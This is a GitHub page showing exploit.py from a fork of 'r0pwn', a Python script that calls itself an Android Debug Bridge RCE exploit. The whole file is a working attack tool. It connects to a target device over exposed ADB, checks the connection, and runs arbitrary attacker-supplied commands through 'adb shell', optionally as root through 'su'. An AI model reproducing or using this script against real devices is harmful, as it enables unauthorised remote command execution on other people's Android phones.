forked from Araknet/r0pwn
-
Notifications
You must be signed in to change notification settings - Fork 1
/
exploit.py
96 lines (88 loc) · 3.14 KB
/
exploit.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
import sys
import time
import os
def connect(device):
print("exploiting "+device+"...")
os.popen("adb connect "+device).read()
time.sleep(1)
def header():
print("""
======================
r0pwn by Ivan Nikolsky
======================
Android Debug Bridge RCE exploit.
""")
def substitute(code):
# r0pwn substitute is an RCE code substitution
# You can substitute code to the target Android
#
angry_substitution = False
#
# angry_substitution means substitute code as root
# It will work only if target device is rooted
if angry_substitution == True:
print("substituting "+code+"...")
time.sleep(0.5)
print("executing "+code+"...")
os.popen("adb shell su '"+code+"'").read()
else:
print("substituting "+code+"...")
time.sleep(0.5)
print("executing "+code+"...")
os.popen("adb shell '"+code+"'").read()
def main():
if len(sys.argv) < 2:
print("usage: exploit.py <target> [-s <code>]")
print("reason [no args given]")
sys.exit()
else:
if len(sys.argv) > 2:
if sys.argv[2] == "-s":
if len(sys.argv) < 4:
print("usage: exploit.py <target> [-s <code>]")
print("reason [no code given]")
sys.exit()
elif len(sys.argv) > 4:
print("usage: exploit.py <target> [-s <code>]")
print("reason [a lot of args given]")
sys.exit()
else:
target = sys.argv[1].split(":")[0]
connect(target)
is_connected = os.popen("adb devices | grep "+target).read()
is_offline = os.popen("adb devices | grep offline").read()
if is_connected == "":
print("failed to connect")
print("reason [connection refused]")
sys.exit()
else:
if is_offline == "":
pass
else:
print("failed to connect")
print("reason [device offline]")
sys.exit()
code = sys.argv[3]
substitute(code)
else:
print("usage: exploit.py <target> [-s <code>]")
print("reason [invalid flag]")
sys.exit()
else:
target = sys.argv[1].split(":")[0]
connect(target)
is_connected = os.popen("adb devices | grep "+target).read()
is_offline = os.popen("adb devices | grep offline").read()
if is_connected == "":
print("failed to connect")
print("reason [connection refused]")
sys.exit()
else:
if is_offline == "":
pass
else:
print("failed to connect")
print("reason [device offline]")
sys.exit()
os.system("adb shell "+target)
main()